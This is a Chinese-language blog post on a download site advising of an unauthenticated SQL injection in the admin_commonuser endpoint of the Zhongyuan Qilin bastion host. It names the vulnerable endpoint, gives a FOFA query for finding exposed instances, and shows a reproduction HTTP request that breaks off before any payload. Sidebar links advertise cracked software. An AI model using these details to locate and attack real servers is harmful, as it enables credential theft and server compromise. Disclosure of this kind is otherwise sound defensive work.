[安全防护] 中远麒麟堡垒机admin_commonuserSQL注入漏洞
作者:CC下载站 日期:2023-09-20 02:27:54 浏览:40 分类:web
一、漏洞简介
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
二、影响版本
中远麒麟堡垒机
三、资产测绘
fofa
cert.subject="Baolei"特征
![[安全防护] 中远麒麟堡垒机admin_commonuserSQL注入漏洞](https://www.cdz423.com/zb_users/upload/2023/09/20230920022847169514812785343.png)
四、漏洞复现
POST /admin.php?controller=admin_commonuser HTTP/1.1 Host: xx.xx.xx.xx Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-
猜你还喜欢
- 04-01 [科学上网] 直连、中转、专线机场有什么区别|良心高效专线机场推荐|hy2机场推荐
- 03-29 [web] 免费公共DNS大全(IPv6+IPv4)
- 03-29 [玩技术] CTFHUB刷题笔记
- 03-22 [AI配音] 有哪些好用的AI智能配音工具值得推荐?
- 03-15 [web] 轻松申请免费域名并绑定到个人网站 | link顶级域名
- 03-15 [运营] 亚马逊如何选品?产品市场分析怎么做?包括哪些方面?
- 03-15 [web] 3分钟,免费拥有你的专属域名——免费一级域名注册申请及域名解析教程
- 03-14 [学习] 必看!手把手教你自动续期微软E5账号,长期畅享5T OneDrive云盘!
- 03-14 [学习] 白嫖5T微软的OneDrive云盘,微软E5申请,真正的免费不限速!
- 03-14 [学习] 微软onedrive E5创建子账号,实现125T云盘空间25账号,附带Office365激活
- 03-08 [web] 手把手教你开通新加坡华侨银行OCBC账户-保姆级教程
- 03-05 [web] PT站是什么?开放注册的国外国内PT站推荐汇总
取消回复欢迎 你 发表评论:
- 精品推荐!
-
- 最新文章
- 热门文章
- 热评文章
![[文件传输] 双轨快传 v1.1.1 (同时使用USB和WIFI传输文件到电脑)](https://www.cdz423.com/zb_users/upload/2024/05/20240508184956171516539659162.jpeg)
[文件传输] 双轨快传 v1.1.1 (同时使用USB和WIFI传输文件到电脑)
![[系统辅助] 最快快捷键V1.2.47 一键切换窗口、启动程序、复制粘贴、按键映射、切换输入法](https://www.cdz423.com/zb_users/upload/2024/05/20240508184337171516501789454.png)
[系统辅助] 最快快捷键V1.2.47 一键切换窗口、启动程序、复制粘贴、按键映射、切换输入法
![[实用工具] 老板键工具-呼来唤去v0.6.0 一键显隐窗口](https://www.cdz423.com/zb_users/upload/2024/05/20240508123313171514279325365.png)
[实用工具] 老板键工具-呼来唤去v0.6.0 一键显隐窗口
![[书籍] 《炁体源流(上下册)》 道家养生经典辑录 米晶子[pdf]](https://www.cdz423.com/zb_users/upload/2024/05/20240507195357171508283778522.jpeg)
[书籍] 《炁体源流(上下册)》 道家养生经典辑录 米晶子[pdf]
![[即时翻译] 实时打字翻译工具-Typing-translationV3.0](https://www.cdz423.com/zb_users/upload/2024/05/20240507155312171506839246301.png)
[即时翻译] 实时打字翻译工具-Typing-translationV3.0
![[转换工具] TMSpeech 1.0免费实时语音转字幕软件](https://www.cdz423.com/zb_users/upload/2024/05/20240507132446171505948666291.jpeg)
[转换工具] TMSpeech 1.0免费实时语音转字幕软件
![[Android] 电工计算器 v10.0.2.1-h](https://www.cdz423.com/zb_users/upload/2024/05/20240507130950171505859057894.jpeg)
[Android] 电工计算器 v10.0.2.1-h
![[美食] 曾经的黑龙江第一城,藏着中国烧烤王者](https://www.cdz423.com/zb_users/upload/2024/05/20240507125511171505771164617.jpeg)
[美食] 曾经的黑龙江第一城,藏着中国烧烤王者
![[媒体编辑] pyVideoTrans视频翻译和配音 v1.42](https://www.cdz423.com/zb_users/upload/2024/05/20240507125010171505741017569.png)
[媒体编辑] pyVideoTrans视频翻译和配音 v1.42
![[趣味工具] 【桌面动态小装扮】蝴蝶1.0、蟑螂1.2、苍蝇1.3](https://www.cdz423.com/zb_users/upload/2024/05/20240506091116171495787636276.jpeg)
[趣味工具] 【桌面动态小装扮】蝴蝶1.0、蟑螂1.2、苍蝇1.3
![[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集](https://www.cdz423.com/zb_users/upload/2024/03/20240330212550171180515014887.jpeg)
[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集
![[云资源] 价值2万元的老男孩Python教程](https://www.cdz423.com/content/uploadfile/201807/7044a3402019825e1e6a9efe74241bf820180720203647.jpg)
[云资源] 价值2万元的老男孩Python教程
![[书库] 史上最全摄影书推荐(附700本PDF版打包下载)](https://www.cdz423.com/zb_users/upload/2024/04/20240402011121171199148142755.jpeg)
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[云资源] 花了一千多元买的私人健身教程](https://www.cdz423.com/zb_users/upload/2024/03/20240331010425171181826527440.png)
[云资源] 花了一千多元买的私人健身教程
![[下载工具] Internet Download Manager 6.42.7 (IDM)](https://www.cdz423.com/zb_users/upload/2024/03/20240325194507171136710766324.png)
[下载工具] Internet Download Manager 6.42.7 (IDM)
![[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G](https://www.cdz423.com/zb_users/upload/2024/03/20240310103327171003800764975.webp)
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
![[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包](https://www.cdz423.com/zb_users/upload/2024/02/20240216140536170806353623293.jpeg)
[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包
![[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版](https://www.cdz423.com/zb_users/upload/2023/10/20231018183151169762511161927.jpeg)
[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版
![[即时通讯] 微信PC版WeChat 3.9.9.43 多开防撤回绿色版](https://www.cdz423.com/zb_users/upload/2024/03/20240322092339171107061999329.jpeg)
[即时通讯] 微信PC版WeChat 3.9.9.43 多开防撤回绿色版
![[安卓软件] Solid Explorer文件管理器APP 2.8.38 破解版](https://www.cdz423.com/zb_users/upload/2024/03/20240325183512171136291243256.png)
[安卓软件] Solid Explorer文件管理器APP 2.8.38 破解版
[云资源] 价值2万元的老男孩Python教程
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
[云资源] 花了一千多元买的私人健身教程
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[动画] 北斗神拳(1984) [两季合集] [MKV]](https://www.cdz423.com/zb_users/upload/2024/04/20240420013131171354789116711.jpeg)
[动画] 北斗神拳(1984) [两季合集] [MKV]
![[资料] 抗战阵亡将士资料+续编](https://www.cdz423.com/zb_users/upload/2024/04/20240411034831171277851194981.jpeg)
[资料] 抗战阵亡将士资料+续编
![[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集](https://www.cdz423.com/zb_users/upload/2024/03/20240325183741171136306189652.jpeg)
[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集
![[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】](https://www.cdz423.com/zb_users/upload/2024/03/20240314090934171037857429792.jpeg)
[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】
![[电影] 2024年喜剧片·热辣滚烫 [mp4]](https://www.cdz423.com/zb_users/upload/2024/02/20240228201247170912236784802.jpeg)
[电影] 2024年喜剧片·热辣滚烫 [mp4]
![[影视] 铁爪 WEB-DL版下载 2023 The Iron Claw 23.48G](https://www.cdz423.com/zb_users/upload/2024/02/20240223003306170861958676145.webp)
[影视] 铁爪 WEB-DL版下载 2023 The Iron Claw 23.48G
- 最新评论
-
我想看看mw2ddyy 评论于:04-26 好东西阿zfy123123 评论于:04-18 谢谢楼主xiaoqi 评论于:04-12 勿在线解压,勿手机解压,请在电脑上用最新款压缩软件解压!推荐360压缩或者好压CC下载站 评论于:04-10 
无法解压啊,客服能不能给个解压教程ravengrey 评论于:04-10 谢谢支持!!CC下载站 评论于:03-26 很棒的资源,感谢分享云体风身 评论于:03-26 感谢分享,好东西云体风身 评论于:03-26 谢谢支持!CC下载站 评论于:03-14 央视精品,感谢付出提供。qwer9009 评论于:03-14
- 热门tag